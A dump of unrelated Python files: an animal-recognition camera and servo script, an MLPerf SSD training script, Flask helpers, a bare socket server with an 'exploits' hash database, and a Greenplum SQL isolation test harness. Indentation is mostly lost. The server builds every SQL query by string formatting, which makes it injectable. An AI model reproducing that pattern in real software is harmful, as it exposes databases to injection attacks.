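def _example_recognize_file(path="sample.jpg"):
    global access_token
    token = get_ai_access_token()
    if token == "error":
        return None
    access_token = token
    img = cv2.imread(path)      # read the image with OpenCV
    img64 = cvimg_to_b64(img)   # JPEG-encode, then base64-encode it
    return get_animal(img64)    # parsed JSON result, or "error" on failure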
def post_request(frame, nt):
"""
Determine whether an animal (or plant) was recognized and extract the useful data.
"""
global animal_info
if time.time() - nt > 3: # only query if more than 3 seconds have elapsed
global now_time # declare now_time as a global variable
now_time = time.time() # reset now_time to the current time in seconds
img64 = cvimg_to_b64(frame) # call cvimg_to_b64
res = get_animal(img64) # call get_animal
print(res)
if "error_msg" in res:
if res["error_msg"] == 'Open api daily request limit reached':
raise Exception('Open api daily request limit reached')
if "error" not in res: # check whether the recognition call failed
try:
animal_info = res["result"] # store the recognition result in animal_info
except Exception:
pass
return # leave the function
def put_Text(cvimg, text, location, size=30):
"""
Draw the animal/plant information onto the frame.
"""
cvimg = Image.fromarray(cv2.cvtColor(cvimg, cv2.COLOR_BGR2RGB))
draw = ImageDraw.Draw(cvimg)
fontText = ImageFont.truetype("./simsun.ttc", size, encoding="utf-8")
draw.text(location, text, (255, 0, 0), font=fontText)
cvimg = cv2.cvtColor(np.array(cvimg), cv2.COLOR_RGB2BGR)
return cvimg
left_pin = Pin(9,Pin.OUT)
right_pin = Pin(3,Pin.OUT)
middle_pin = Pin(6,Pin.OUT)
def speed():
i = 40
middle_pin.write_analog(i)
left_pin.write_analog(0)
right_pin.write_analog(180)
flag = True
animal = None
while True:
while i<160 and flag == True:
if animal_info != None and len(animal_info) > 1:
if animal == animal_info[0]["name"]:
i+=1
if i == 160:
flag = False
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
else:
right_pin.write_analog(0)
animal = animal_info[0]["name"]
save_audio(animal_info[0]["name"])
time.sleep(3)
else:
i+=1
if i == 160:
flag = False
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
left_pin.write_analog(0)
right_pin.write_analog(180)
while i>40 and flag == False:
if animal_info != None and len(animal_info) > 1:
if animal == animal_info[0]["name"]:
i-=1
if i == 40:
flag = True
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
else:
left_pin.write_analog(180)
animal = animal_info[0]["name"]
save_audio(animal_info[0]["name"])
time.sleep(3)
else:
i-=1
if i == 40:
flag = True
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
left_pin.write_analog(0)
right_pin.write_analog(180)
def main(pid):
"""
Main function of the program.
"""
token = get_ai_access_token()
if token != "error":
global access_token
access_token = token
cap = cv2.VideoCapture(0) # create the camera capture object
global now_time # declare now_time as a global variable
now_time = time.time() # set now_time to the current time in seconds
while (True): # loop forever, reading frames from the camera
ret, frame = cap.read() # read one frame from the camera
if ret == True: # check whether the read succeeded
# resize onto a 1280x800 canvas
frame1 = cv2.resize(frame, (1280, 800), interpolation=cv2.INTER_LINEAR)
# start a worker thread to process the captured frame
t=threading.Thread(target=post_request,args=(frame,now_time,), name='POST_REQUEST')
t.start() # start the thread
if not animal_info or animal_info[0]["name"]=="非动物": # "非动物" means "not an animal"
frame1 = put_Text(frame1, "Waiting...", (50, 50)) # show "Waiting..." on the canvas
elif animal_info[0]["name"]!="非动物":
print(animal_info[0]) # print the animal info
try:
# draw the text on the canvas
#for i in range(5):
frame1 = put_Text(frame1, str(animal_info[0]["score"][:4]), (150, 0 * 70 + 50))
frame1 = put_Text(frame1, str(animal_info[0]["name"]), (320, 0 * 70 + 50))
#for i in range(5):
frame1 = put_Text(frame1, "score:", (50, 0 * 70 + 50))
frame1 = put_Text(frame1, "name:", (250, 0 * 70 + 50))
except Exception:
pass
cv2.imshow('Magic Image', frame1)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
os.kill(pid,signal.SIGKILL)
if __name__ == "__main__":
pid = os.getpid()
t_main = threading.Thread(target=main,args=(pid,))
t_main.start()
speed()
|
ssd_main.py
|
# Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training script for SSD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import multiprocessing
import sys
import threading
from absl import app
import tensorflow.compat.v1 as tf
from REDACTED.tensorflow_models.mlperf.models.rough.mlp_log import mlp_log
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import coco_metric
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import dataloader
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import ssd_constants
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import ssd_model
from REDACTED.tensorflow_models.mlperf.models.rough.util import train_and_eval_runner
# copybara:strip_begin
from REDACTED.REDACTED.multiprocessing import REDACTEDprocess
# copybara:strip_end
tf.flags.DEFINE_string(
'resnet_checkpoint',
'/REDACTED/mb-d/home/tpu-perf-team/ssd_checkpoint/resnet34_bs2048_2',
'Location of the ResNet checkpoint to use for model '
'initialization.')
tf.flags.DEFINE_string('hparams', '',
'Comma separated k=v pairs of hyperparameters.')
tf.flags.DEFINE_integer(
'num_shards', default=8, help='Number of shards (TPU cores) for '
'training.')
tf.flags.DEFINE_integer('train_batch_size', 64, 'training batch size')
tf.flags.DEFINE_integer('eval_batch_size', 1, 'evaluation batch size')
tf.flags.DEFINE_integer('eval_samples', 5000, 'The number of samples for '
'evaluation.')
tf.flags.DEFINE_integer(
'iterations_per_loop', 1000, 'Number of iterations per TPU training loop')
tf.flags.DEFINE_string(
'training_file_pattern',
'REDACTEDtrain*',
'Glob for training data files (e.g., COCO train - minival set)')
tf.flags.DEFINE_string(
'validation_file_pattern',
'REDACTEDval*',
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
tf.flags.DEFINE_bool(
'use_fake_data', False,
'Use fake data to reduce the input preprocessing overhead (for unit tests)')
tf.flags.DEFINE_string(
'val_json_file',
'REDACTEDinstances_val2017.json',
'COCO validation JSON containing golden bounding boxes.')
tf.flags.DEFINE_integer('num_examples_per_epoch', 118287,
'Number of examples in one epoch')
tf.flags.DEFINE_integer('num_epochs', 64, 'Number of epochs for training')
tf.flags.DEFINE_multi_integer(
'input_partition_dims',
default=None,
help=('Number of partitions on each dimension of the input. Each TPU core'
' processes a partition of the input image in parallel using spatial'
' partitioning.'))
tf.flags.DEFINE_integer(
'dataset_threadpool_size', default=48,
help=('The size of the private threadpool used by the dataset.'))
tf.flags.DEFINE_bool('run_cocoeval', True, 'Whether to run cocoeval')
FLAGS = tf.flags.FLAGS
_STOP = -1
def construct_run_config(iterations_per_loop):
"""Construct the run config."""
# Parse hparams
hparams = ssd_model.default_hparams()
hparams.parse(FLAGS.hparams)
return dict(
hparams.values(),
num_shards=FLAGS.num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
resnet_checkpoint=FLAGS.resnet_checkpoint,
val_json_file=FLAGS.val_json_file,
model_dir=FLAGS.model_dir,
iterations_per_loop=iterations_per_loop,
steps_per_epoch=FLAGS.num_examples_per_epoch // FLAGS.train_batch_size,
eval_samples=FLAGS.eval_samples,
transpose_input=False if FLAGS.input_partition_dims is not None else True,
use_spatial_partitioning=True
if FLAGS.input_partition_dims is not None else False,
dataset_threadpool_size=FLAGS.dataset_threadpool_size
)
# copybara:strip_begin
def REDACTED_predict_post_processing():
"""REDACTED batch-processes the predictions."""
q_in, q_out = REDACTEDprocess.get_user_data()
predict_post_processing(q_in, q_out)
# copybara:strip_end
def predict_post_processing(q_in, q_out):
"""Run post-processing on CPU for predictions."""
coco_gt = coco_metric.create_coco(FLAGS.val_json_file, use_cpp_extension=True)
current_step, predictions = q_in.get()
while current_step != _STOP and q_out is not None:
q_out.put((current_step,
coco_metric.compute_map(
predictions,
coco_gt,
use_cpp_extension=True,
nms_on_tpu=True)))
current_step, predictions = q_in.get()
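# Illustrative sketch (not part of the original script): the queue protocol
# used by predict_post_processing(). A producer puts (step, detections)
# tuples on q_in and finally a (_STOP, None) poison pill; results come back
# on q_out as (step, metrics) tuples. `detections` is a hypothetical
# placeholder for the eval output enqueued by eval_finish_fn() below.
def _example_feed_post_processing(q_in, q_out, detections, step=0):
  q_in.put((step, detections))  # one batch of predictions for the worker
  q_in.put((_STOP, None))       # tell the worker loop to exit afterwards
  return q_out.get()            # (step, COCO metrics) from the worker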
def main(argv):
del argv # Unused.
params = construct_run_config(FLAGS.iterations_per_loop)
params['batch_size'] = FLAGS.train_batch_size // FLAGS.num_shards
input_partition_dims = FLAGS.input_partition_dims
train_steps = FLAGS.num_epochs * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
eval_steps = int(math.ceil(FLAGS.eval_samples / FLAGS.eval_batch_size))
runner = train_and_eval_runner.TrainAndEvalRunner(FLAGS.iterations_per_loop,
train_steps, eval_steps,
FLAGS.num_shards)
mlp_log.mlperf_print(key='cache_clear', value=True)
mlp_log.mlperf_print(key='init_start', value=None)
mlp_log.mlperf_print('global_batch_size', FLAGS.train_batch_size)
mlp_log.mlperf_print('opt_base_learning_rate', params['base_learning_rate'])
mlp_log.mlperf_print(
'opt_learning_rate_decay_boundary_epochs',
[params['first_lr_drop_epoch'], params['second_lr_drop_epoch']])
mlp_log.mlperf_print('opt_weight_decay', params['weight_decay'])
mlp_log.mlperf_print(
'model_bn_span', FLAGS.train_batch_size // FLAGS.num_shards *
params['distributed_group_size'])
mlp_log.mlperf_print('max_samples', ssd_constants.NUM_CROP_PASSES)
mlp_log.mlperf_print('train_samples', FLAGS.num_examples_per_epoch)
mlp_log.mlperf_print('eval_samples', FLAGS.eval_samples)
train_input_fn = dataloader.SSDInputReader(
FLAGS.training_file_pattern,
params['transpose_input'],
is_training=True,
use_fake_data=FLAGS.use_fake_data,
params=params)
eval_input_fn = dataloader.SSDInputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
distributed_eval=True,
count=eval_steps * FLAGS.eval_batch_size,
params=params)
def init_fn():
tf.train.init_from_checkpoint(params['resnet_checkpoint'], {
'resnet/': 'resnet%s/' % ssd_constants.RESNET_DEPTH,
})
runner.initialize(train_input_fn, eval_input_fn,
functools.partial(ssd_model.ssd_model_fn,
params), FLAGS.train_batch_size,
FLAGS.eval_batch_size, input_partition_dims, init_fn)
mlp_log.mlperf_print('init_stop', None)
mlp_log.mlperf_print('run_start', None)
if FLAGS.run_cocoeval:
# copybara:strip_begin
q_in, q_out = REDACTEDprocess.get_user_data()
processes = [
REDACTEDprocess.Process(target=REDACTED_predict_post_processing) for _ in range(4)
]
# copybara:strip_end_and_replace_begin
# q_in = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# q_out = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# processes = [
# multiprocessing.Process(
# target=predict_post_processing, args=(q_in, q_out))
# for _ in range(self.num_multiprocessing_workers)
# ]
# copybara:replace_end
for p in processes:
p.start()
def log_eval_results_fn():
"""Print out MLPerf log."""
result = q_out.get()
success = False
while result[0] != _STOP:
if not success:
steps_per_epoch = (
FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
epoch = (result[0] + FLAGS.iterations_per_loop) // steps_per_epoch
mlp_log.mlperf_print(
'eval_accuracy',
result[1]['COCO/AP'],
metadata={'epoch_num': epoch})
mlp_log.mlperf_print('eval_stop', None, metadata={'epoch_num': epoch})
if result[1]['COCO/AP'] > ssd_constants.EVAL_TARGET:
success = True
mlp_log.mlperf_print(
'run_stop', None, metadata={'status': 'success'})
result = q_out.get()
if not success:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'abort'})
log_eval_result_thread = threading.Thread(target=log_eval_results_fn)
log_eval_result_thread.start()
def eval_init_fn(cur_step):
"""Executed before every eval."""
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_start',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
mlp_log.mlperf_print(
'eval_start',
None,
metadata={
'epoch_num': epoch + FLAGS.iterations_per_loop // steps_per_epoch
})
def eval_finish_fn(cur_step, eval_output, _):
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_stop',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
if FLAGS.run_cocoeval:
q_in.put((cur_step, eval_output['detections']))
runner.train_and_eval(eval_init_fn, eval_finish_fn)
if FLAGS.run_cocoeval:
for _ in processes:
q_in.put((_STOP, None))
for p in processes:
try:
p.join(timeout=10)
except Exception: # pylint: disable=broad-except
pass
q_out.put((_STOP, None))
log_eval_result_thread.join()
# Clear out all the queues to avoid deadlock.
while not q_out.empty():
q_out.get()
while not q_in.empty():
q_in.get()
if __name__ == '__main__':
# copybara:strip_begin
user_data = (multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE),
multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE))
in_compile_test = False
for arg in sys.argv:
if arg == '--xla_jf_exit_process_on_compilation_success=true':
in_compile_test = True
break
if in_compile_test:
# Exiting from XLA's C extension skips REDACTEDprocess's multiprocessing clean
# up. Don't use REDACTED process when xla is in compilation only mode.
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
else:
with REDACTEDprocess.main_handler(user_data=user_data):
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
# copybara:strip_end
# copybara:insert tf.logging.set_verbosity(tf.logging.INFO)
# copybara:insert app.run(main)
|
utils.py
|
# coding=utf-8
import json
import random
from bson import ObjectId
from flask_mail import Message
from . import extensions, models
from threading import Thread
from flask import current_app, session, request
class JSONEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
return json.JSONEncoder.default(self, o)
def verify_num(code):
from .code_msg import VERIFY_CODE_ERROR
if code != session['ver_code']:
raise models.GlobalApiException(VERIFY_CODE_ERROR)
# return result
def gen_verify_num():
a = random.randint(-20, 20)
b = random.randint(0, 50)
data = {'question': str(a) + ' + ' + str(b) + " = ?", 'answer': str(a + b)}
session['ver_code'] = data['answer']
return data
def gen_cache_key():
return 'view//' + request.full_path
def send_mail_async(app, msg):
with app.app_context():
extensions.mail.send(msg)
def send_email(to, subject, body, is_txt=True):
app = current_app._get_current_object()
msg = Message(subject=app.config.get('MAIL_SUBJECT_PREFIX') + subject, sender=app.config.get('MAIL_USERNAME'), recipients=[to])
if is_txt:
msg.body = body
else:
msg.html = body
thr = Thread(target=send_mail_async, args=[app, msg])
thr.start()
return thr
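# Illustrative sketch (not part of the original module): send_email() builds
# the Message on the calling thread and delivers it in the background, so a
# test can join() the returned thread to wait for delivery. The recipient,
# subject and body below are hypothetical.
def _example_send_and_wait():
    thr = send_email("user@example.com", "Welcome", "<p>Hello</p>", is_txt=False)
    thr.join()
    return thr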
|
run.py
|
import json
import logging
import os
import socket
import sqlite3
import threading
logger = logging.getLogger("WebServer")
logger.setLevel(logging.INFO)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
logger.addHandler(console_handler)
logging.root = logger
def _connect_to_db(db_path):
logging.info("Connecting to: {}".format(db_path))
con = sqlite3.connect(db_path)
return con
def get_function(parameters):
global db_path
_DB_CON_ = _connect_to_db(db_path)
logging.info("Calling get function with parameters: {}".format(parameters))
item = parameters[0]
items = item.split(" ")
if len(items) == 2:
return construct_response(400, "Bad Request")
else:
item = items[1].strip("/")
if len(item) == 0:
st = _DB_CON_.execute("SELECT * from exploits").fetchall()
tt = {"status_code": 1, "result": st}
return append_dict(construct_response(200, "OK"), tt)
if len(item) != 32:
tt = {"status_code": -1, "result": "Invalid md5"}
return append_dict(construct_response(400, "Bad Request"), tt)
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(item)).fetchall()
if len(st) == 0:
tt = {"status_code": 0}
else:
tt = {"status_code": 1, "result": [{"md5": st[0][0], "description": st[0][1]}]}
return append_dict(construct_response(200, "OK"), tt)
def put_function(parameters):
logging.info("Calling put function with parameters: {}".format(parameters))
md5 = ''
description = ''
for item in parameters:
if "md5" in item:
md5 = item.split("\"md5\":")[1].split('"')[1].split('"')[0]
description = item.split("\"details\":")[1].split('"')[1].split('"')[0]
if md5 == '' or description == '':
tt = {"md5":md5, "description": description}
return append_dict(construct_response(400, "Bad Request"), tt)
items = parameters[0].split(" ")
item = items[1].strip("/")
_DB_CON_ = _connect_to_db(db_path)
if len(item) == 0:
_DB_CON_.execute("INSERT into exploits values('{}', '{}')".format(md5, description))
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(md5)).fetchall()
_DB_CON_.commit()
if len(st) != 0:
tt = {"status_code": 1, "result": json.dumps(st)}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
elif len(item) == 32:
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(md5)).fetchall()
_DB_CON_.commit()
if len(st) != 0:
st = _DB_CON_.execute("UPDATE exploits set details = '{}' where md5='{}'".format(description, md5))
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(item)).fetchall()
_DB_CON_.commit()
tt = {"status_code": 1, "result": json.dumps(st)}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": -1, "result": "Invalid md5"}
return append_dict(construct_response(400, "Bad Request"), tt)
def post_function(parameters):
logging.info("Calling post function with parameters: {}".format(parameters))
_DB_CON_ = _connect_to_db(db_path)
_DB_CON_.execute("DELETE from exploits")
new_result = []
for item in parameters:
if "md5" in item:
results = item.split(",")
counter = 0
rez = {"md5":None, "details":None}
for tt in results:
if "md5" in tt:
md5 = tt.split("\"md5\":")[1].split('"')[1].split('"')[0]
rez = {"md5": md5, "details":None}
if "details" in tt:
description = tt.split("\"details\":")[1].split('"')[1].split('"')[0]
rez["details"] = description
new_result.append(rez.copy())
for item in new_result:
_DB_CON_.execute("INSERT into exploits values('{}','{}')".format(item["md5"], item["details"]))
_DB_CON_.commit()
return construct_response(202, "Accepted")
def delete_function(parameters):
logging.info("Calling delete function with parameters: {}".format(parameters))
global db_path
_DB_CON_ = _connect_to_db(db_path)
item = parameters[0]
items = item.split(" ")
if len(items) == 2:
return construct_response(400, "Bad Request")
else:
item = items[1].strip("/")
if len(item) == 0:
st = _DB_CON_.execute("DELETE from exploits")
tt = {"status_code": 1, "result": "all data has been deleted"}
st = _DB_CON_.execute("SELECT * from exploits").fetchall()
_DB_CON_.commit()
if len(st) == 0:
tt = {"status_code": 1, "result": "ALL DATA HAS BEEN DELETED"}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
if len(item) != 32:
tt = {"status_code": -1, "result": "Invalid md5"}
return append_dict(construct_response(400, "Bad Request"), tt)
st = _DB_CON_.execute("DELETE from exploits where md5='{}'".format(item))
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(item)).fetchall()
_DB_CON_.commit()
if len(st) == 0:
tt = {"status_code": 1, "result": "DATA HAS BEEN DELETED"}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
possible_requests = {
"get": get_function,
"put": put_function,
"post": post_function,
"delete": delete_function,
}
def construct_response(code, text):
response = ''
response += 'HTTP/1.1 {} {}\r\n'.format(code, text)
response += 'Connection: close\r\n\r\n'
return response.encode()
def append_dict(response, dict):
response = response.decode()
response += json.dumps(dict)
response = response.encode()
return response
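# Illustrative sketch (added for clarity, not part of the original server):
# responses are a raw HTTP/1.1 status line plus a Connection header, and JSON
# payloads are appended afterwards with append_dict().
def _example_ok_response():
    payload = {"status_code": 1, "result": []}
    return append_dict(construct_response(200, "OK"), payload)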
def server_function(client, address):
logging.info("[server function][connection] client: {} | address: {}".format(client, address))
while True:
packet = client.recv(4096).decode()
packet = packet.split("\r\n")
logging.info("packet:\n{}".format(packet))
method = packet[0].split(" ")[0].lower()
if method not in possible_requests:
response = construct_response(400, "Bad Request")
else:
response = possible_requests[method](packet)
logger.info(packet)
logging.info("sending response: {}".format(response))
client.send(response)
client.close()
break
host = socket.gethostname()
port = int(input("Please insert the server port: "))
html_docs = str(input("Please insert the directory path for your resources: "))
logging.info("Preparing to start the server {}:{} | Resource location: {}".format(host, port, html_docs))
logging.info("Creating the server...")
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind((host, port))
serversocket.listen(5)
logger.info("Server has started...")
db_path = os.path.join(html_docs, "data")
while True:
(client, address) = serversocket.accept()
logging.info("[new connection] client: {} | address: {}".format(client, address))
threadObj = threading.Thread(target=server_function, args=(client, address))
threadObj.start()
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pygresql.pg
import os
import subprocess
import re
import multiprocessing
import time
import sys
import socket
from optparse import OptionParser
import traceback
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(\d+|[*])([&\\<\\>Uq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, self.out_file.name, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
raise Exception("Forked command is not blocking")
self.has_open = True
def join(self):
print >>self.out_file, " <... completed>"
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, output_file, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = pygresql.pg.connect(host=hostname,
port=port,
opt="-c gp_session_role=utility",
dbname=self.dbname)
else:
self.con = pygresql.pg.connect(dbname=self.dbname)
self.filename = "%s.%s" % (output_file, os.getpid())
def get_utility_mode_port(self, name):
"""
Gets the port number/hostname combination of the
dbid with the id = name
"""
con = pygresql.pg.connect(dbname=self.dbname)
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE dbid = %s" % name).getresult()
if len(r) == 0:
raise Exception("Invalid dbid %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
This is pretty dirty, but apparently the only way
to get the pretty output of the query result.
The reason is that for some python-internal reason
print(r) calls the correct function while neither str(r)
nor repr(r) outputs something useful.
"""
with open(self.filename, "w") as f:
print >>f, r,
f.flush()
with open(self.filename, "r") as f:
ppr = f.read()
return ppr.strip() + "\n"
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, self.printout_result(r))
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
if os.path.exists(self.filename):
os.unlink(self.filename)
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
del self.processes[(name, utility_mode)]
def get_all_primary_dbids(self, dbname):
"""
Retrieves all primary DBIDs (including the master). Intended for use by
*U queries.
"""
if not dbname:
dbname = self.dbname
con = pygresql.pg.connect(dbname=dbname)
result = con.query("SELECT dbid FROM gp_segment_configuration WHERE role = 'p'").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(dbid[0]) for dbid in result]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specified, it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
if sql.startswith('!'):
cmd_output = subprocess.Popen(sql[1:].strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
print >> output_file
print >> output_file, cmd_output.stdout.read()
else:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "U":
if process_name == '*':
process_names = [str(dbid) for dbid in self.get_all_primary_dbids(dbname)]
else:
process_names = [process_name]
for name in process_names:
self.get_process(output_file, name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "U&":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).fork(sql.strip(), True)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
#tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
(command_part, dummy, comment) = line.partition("--")
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line) or re.match(r"^\d+U[\\<]:$", line):
command += command_part
try:
self.process_command(command, output_file)
except Exception as e:
print >>output_file, "FAILED: ", e
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
